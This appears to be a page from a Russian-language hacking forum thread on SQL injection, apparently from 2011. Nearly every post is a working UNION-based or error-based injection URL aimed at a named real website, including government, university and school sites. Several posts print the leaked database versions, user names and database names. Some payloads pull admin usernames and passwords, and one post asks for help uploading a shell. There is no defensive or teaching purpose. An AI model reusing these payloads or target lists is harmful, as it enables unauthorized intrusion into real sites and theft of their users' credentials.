SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Komyak

    Komyak Banned

    Joined:
    14 Jan 2009
    Messages:
    202
    Likes Received:
    18
    Reputations:
    1
    Code:
    http://gps.smartzone.ru/razdel.php?id_raz=-1+UNION+SELECT+1,user()--&param=list
    
    phpbb3_users
    client
    smartzone_users
     
  2. danielito

    danielito Banned

    Joined:
    7 Feb 2011
    Messages:
    11
    Likes Received:
    0
    Reputations:
    -1
    http://indabattle.com/Malenkiy_Pavlik/?page=-255+union+select+1,2,3,table_name,5+from+information_schema.tables+limit+222,1--


    админка /administrator

    Сможет кто шелл залить? или в админку зайти
    пассы вида md5:salt
     
  3. Hack_ERR++

    Hack_ERR++ Member

    Joined:
    13 Aug 2009
    Messages:
    41
    Likes Received:
    9
    Reputations:
    0
    Code:
    http://autocatalog.bg/marka.php?id=-23+union+select+1,2,3,concat_ws(0x20,type,password),5,6+from+admin_users--
    http://www.bigbay.bz/develdesc.php?id=-23+union+select+1,concat_ws%280x20,id,username,password%29,3,4,5,6,7,8,9,10,11,12,13+from+prop_admin--
    
     
  4. barbara

    barbara New Member

    Joined:
    21 Feb 2011
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Code:
    http://kostroma.rfn.ru/rnews.html?id=46429+OR+1=1+ORDER+BY+11--
    http://kostroma.rfn.ru/rnews.html?id=46429+OR+1=1+ORDER+BY+SYSDATE--
    
    Подобные команды работают, что дает основания полагать, что субд - оракл, а таблица имеет 11 колонок. Если кто хорошо знаком с ораклом, можете поиграться. Или тут вряд ли можно что-то полезное раздобыть? :)
     
  5. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    http://www.exploratorium.edu/imaging_station/gallery.php?Asset=Human%20red%20blood%20cells&Group=&Category=Blood%20Cells&Section=Introduction'+or+1+group+by+concat((select+user()),floor(rand(0)*2))+having+min(0)--+

    user:[email protected]
     
  6. Koren

    Koren Member

    Joined:
    11 Jul 2009
    Messages:
    66
    Likes Received:
    20
    Reputations:
    1
    smallville
    http://smallville.fanwebsite.co.uk/music.php?smallville_episodeid=-67+union+select+1,version%28%29,3,4,5--
     
    1 person likes this.
  7. Slay90

    Slay90 Member

    Joined:
    12 Apr 2009
    Messages:
    146
    Likes Received:
    16
    Reputations:
    -5
    //система антибаян описана в первом посте
     
    #13587 Slay90, 21 Feb 2011
    Last edited by a moderator: 21 Feb 2011
  8. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    ничего личного

    http://islamvolga.ru/veroucheniya.php?cat=-1%20and%201=2%20union%20select%201,concat_ws(char(58),@@version,user(),database(),@@version_compile_os),3,4,5,6,7--

    5.1.47-rel11.2-log djklm38@localhost djklm38_forall unknown-linux-gnu

    http://islamvolga.ru/veroucheniya.php?cat=-1%20and%201=2%20union%20select%201,concat_ws(char(58),username,password,email),3,4,5,6,7%20from%20erz_users--
     
    1 person likes this.
  9. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    _http://k156.ru/2/1/catview.php?cat_id=-2+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5--

    _http://monolit44.ru/catviewarm.php?catarm_id=-10+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),database(),user())--

    _http://stroyvektor.com/foto.php?fot=-2+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7--

    _http://citadel-kostroma.ru/catviewflat.php?cat57_id2=-9+union+select+concat_ws(0x3a,version(),database(),user())--

    _http://www.newchemistry.ru/himprocesses.php?cat_id=-36+union+select+concat_ws(0x3a,version(),database(),user())--

    _http://www.marich.od.ua/board.php?cat_id=-2+union+select+concat_ws(0x3a,version(),database(),user())--
     
    _________________________
    #13589 winstrool, 22 Feb 2011
    Last edited: 22 Feb 2011
  10. danielito

    danielito Banned

    Joined:
    7 Feb 2011
    Messages:
    11
    Likes Received:
    0
    Reputations:
    -1
    http://www.astrakhanfm.ru/news/news.php?id=99999+union+select+1,2,3,4,version(),6,7--
     
  11. asql

    asql New Member

    Joined:
    19 Feb 2011
    Messages:
    32
    Likes Received:
    0
    Reputations:
    -3
    http://la2-shop.ru/articles.php?id=-2'+union+select+1,2,version()--'
    сплошная дырка...
     
  12. asql

    asql New Member

    Joined:
    19 Feb 2011
    Messages:
    32
    Likes Received:
    0
    Reputations:
    -3
    http://www.doneco.org.ua/showwork.php?id=9999+union+select+1,version()--
    4.1.22-standard-log...(
     
  13. keng

    keng Member

    Joined:
    9 Apr 2008
    Messages:
    60
    Likes Received:
    43
    Reputations:
    8
    Бар SПБ.

    h**p://www.barspb.ru/places.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--

    Версия: 5.1.50-log
    Юзер: [email protected]
     
  14. TOP4

    TOP4 Banned

    Joined:
    19 Dec 2010
    Messages:
    23
    Likes Received:
    4
    Reputations:
    1
    http://www.voladm.gov.ua/news.php?id=50901+union+select+1,user(),3,4,5,database(),7,8,9,10,11,12,13,14--
     
  15. TOP4

    TOP4 Banned

    Joined:
    19 Dec 2010
    Messages:
    23
    Likes Received:
    4
    Reputations:
    1
    http://www.cva.edu/gallery/detail.php?ID=86-999.9+union+select+1,2,3,4,5,6,7--
    http://biophysics.asu.edu/CBP/seminars.php?type=Meeting&ID=10647-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12--
    http://www.arabpressnetwork.org/newspapersprint.php?id=173-999.9+union+select+1,2,3,4,5--
     
  16. telon

    telon New Member

    Joined:
    25 Feb 2011
    Messages:
    1
    Likes Received:
    0
    Reputations:
    -5
    http://www.mywowgold.ru/modules/zakaz/?data[form][blank_amount]='
     
  17. keng

    keng Member

    Joined:
    9 Apr 2008
    Messages:
    60
    Likes Received:
    43
    Reputations:
    8
    wcg.ru PR-5

    h**p://www.wcg.ru/grandfinal/index.php?ID=-1+union+select+1,2--
    h**p://www.wcg.ru/wcgtv/addcnt.php?ID=-1+union+select+1--

    Version: 5.1.37
    Database: wcg
    User: wcg@localhost
     
    #13597 keng, 25 Feb 2011
    Last edited: 26 Feb 2011
    1 person likes this.
  18. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    195
    Likes Received:
    161
    Reputations:
    108
    russobit-press.ru

    Code:
    http://russobit-press.ru/forum.php/news.php?language=&stage=message&show=-31212+union+select+concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7,8--
    Code:
    5.0.45:root@localhost:rbit
    kansaspublicradio.org PR-5

    Code:
    http://kansaspublicradio.org/newsstory.php?itemID=15091+and+substring((SELECT+version()),1,1)=5+--+
    caldwellschools.org PR-5

    Code:
    http://www.caldwellschools.org/News/FullStory.php?NewsID=842+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid(version(),1,63),floor(rand(0)*2)))+--+
    Code:
    Duplicate entry '5.0.261' for key 1
     
    1 person likes this.
  19. ubi

    ubi Elder - Старейшина

    Joined:
    25 Dec 2009
    Messages:
    308
    Likes Received:
    76
    Reputations:
    19
    http://hyenacart.com/bellajunction/index.php?info=null+and+1=2+union+select+1,version(),3,4,5,6

    4.1.22-standard
     
  20. Fooog

    Fooog Elder - Старейшина

    Joined:
    19 Sep 2008
    Messages:
    307
    Likes Received:
    170
    Reputations:
    12
    acmenoveltyarchive.org
    PR 4
    Code:
    http://www.acmenoveltyarchive.org/category.php?cat=-1 union select 1,concat_ws(0x3a,user(),version(),database()),3 --

    stormdance.de
    PR 4
    Code:
    http://www.stormdance.de/?cat=-22 union select 1,2,3,4,5,concat_ws(0x3a,user(),version(),database()),7,8,9 --

    citymagazine.rs
    PR 5
    Code:
    http://www.citymagazine.rs/page.php?cat=4 union select info() --

    ipv6.njust.edu.cn
    .edu
    PR 1
    Code:
    http://ipv6.njust.edu.cn/show.php?id=-1 union select 1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15 --
     
    #13600 Fooog, 26 Feb 2011
    Last edited: 26 Feb 2011
    1 person likes this.
Thread Status:
Not open for further replies.